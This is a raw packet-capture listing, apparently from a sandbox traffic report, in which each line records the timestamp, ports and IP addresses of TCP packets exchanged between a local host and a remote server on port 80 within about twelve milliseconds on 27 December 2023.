Dec 27, 2023 18:12:25.296325922 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.296329975 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.296341896 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.296348095 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.296349049 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.296367884 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.296390057 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.296408892 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.296416998 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.296432018 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.296439886 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.296452045 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.296457052 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.296458006 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.296466112 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.296475887 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.296504021 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.297175884 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.297183037 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.297194958 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.297200918 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.297208071 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.297219992 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.297225952 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.297245979 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.297251940 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.297252893 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.297278881 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.297281027 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.297310114 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.297349930 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.297517061 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.297524929 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.297565937 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.297645092 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.297652006 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.297663927 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.297671080 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.297677994 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.297688961 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.297691107 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.297700882 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.297708035 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.297710896 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.297715902 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.297728062 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.297734976 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.297738075 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.297741890 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.297754049 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.297761917 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.297764063 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.297769070 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.297775030 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.297786951 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.297791958 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.297811031 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.297827005 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.297840118 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.298914909 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.298938036 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.298975945 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.298979998 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.298983097 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.298995972 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.299025059 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.299034119 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.299129963 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.299154997 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.299185991 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.299192905 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.299201965 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.299231052 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.299289942 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.299298048 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.299309015 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.299315929 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.299323082 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.299335957 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.299350023 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.299354076 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.299356937 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.299391031 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.299426079 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.299468040 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.299475908 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.299488068 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.299514055 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.299537897 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.299545050 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.299567938 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.299575090 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.299581051 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.299596071 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.299668074 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.299765110 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.299772024 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.299779892 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.299803019 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.299817085 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.299830914 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.300074100 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.300081015 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.300118923 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.300153971 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.300160885 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.300173044 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.300179005 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.300185919 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.300196886 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.300199986 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.300216913 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.300224066 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.300235987 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.300244093 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.300255060 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.300281048 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.300338030 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.300344944 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.300355911 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.300363064 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.300369978 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.300380945 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.300381899 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.300410986 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.300427914 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.300447941 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.300462008 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.300874949 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.300883055 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.300920010 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.300935984 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.300945044 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.300952911 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.300960064 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.300966024 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.300977945 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.300980091 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.301007986 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.301007986 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.301031113 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.301079988 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.301155090 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.301162958 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.301192045 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.301194906 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.301198959 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.301234007 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.301294088 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.301301003 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.301307917 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.301314116 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.301321030 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.301327944 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.301331043 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.301358938 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.301748991 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.301757097 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.301768064 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.301798105 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.301810026 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.301816940 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.301829100 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.301858902 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.301883936 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.301934004 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.301954031 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.301961899 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.301969051 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.301992893 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.302350044 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.302357912 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.302364111 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.302371025 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.302380085 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.302393913 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.302424908 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.302510023 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.302517891 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.302529097 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.302535057 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.302541971 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.302547932 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.302553892 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.302556992 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.302561045 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.302573919 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.302580118 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.302581072 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.302587986 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.302596092 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.302602053 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.302602053 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.302615881 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.302618980 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.302623034 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.302644014 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.302660942 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.303206921 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.303214073 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.303220987 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.303226948 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.303255081 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.303256035 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.303301096 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.303311110 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.303318024 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.303347111 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.303394079 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.303400993 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.303411961 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.303419113 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.303426981 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.303435087 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.303438902 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.303458929 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.303462029 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.303469896 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.303477049 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.303477049 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.303503990 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.303528070 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.303535938 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.303550005 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.303556919 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.303574085 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.303605080 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.304135084 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.304182053 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.304188967 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.304195881 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.304219007 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.304240942 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.304255962 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.304264069 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.304276943 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.304301977 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.304306030 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.304308891 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.304321051 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.304346085 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.304725885 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.304742098 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.304749012 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.304755926 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.304780960 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.304805040 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.304812908 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.304826021 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.304831982 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.304840088 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.304846048 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.304852962 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.304864883 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.304872990 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.304879904 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.304886103 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.304888964 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.304910898 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.304959059 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.304965973 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.304972887 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.304979086 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.304986954 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.304999113 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.304999113 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.305036068 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.305526972 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.305551052 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.305557966 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.305566072 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.305583954 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.305597067 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.305599928 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.305651903 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.305660009 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.305699110 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.305751085 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.305757999 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.305763960 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.305769920 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.305777073 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.305790901 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.305799961 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.305805922 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.305811882 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.305814028 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.305819035 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.305825949 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.305833101 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.305840969 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.305845976 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.305852890 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.305857897 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.305880070 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.305898905 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.306518078 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.306548119 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.306579113 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.306583881 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.306586027 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.306618929 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.306665897 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.306679010 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.306704044 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.306710958 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.306716919 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.306724072 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.306731939 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.306746960 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.306762934 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.307002068 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.307008982 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.307040930 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.307043076 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.307048082 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.307060003 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.307086945 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.307209969 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.307216883 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.307229042 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.307235956 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.307255983 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.307259083 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.307266951 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.307279110 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.307307005 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.307329893 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.307337046 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.307347059 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.307353020 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.307359934 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.307368040 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.307377100 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.307378054 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.307399035 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.307399988 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.307439089 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.307450056 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.307924986 CET	80	49738	5.42.65.125	192.168.2.4
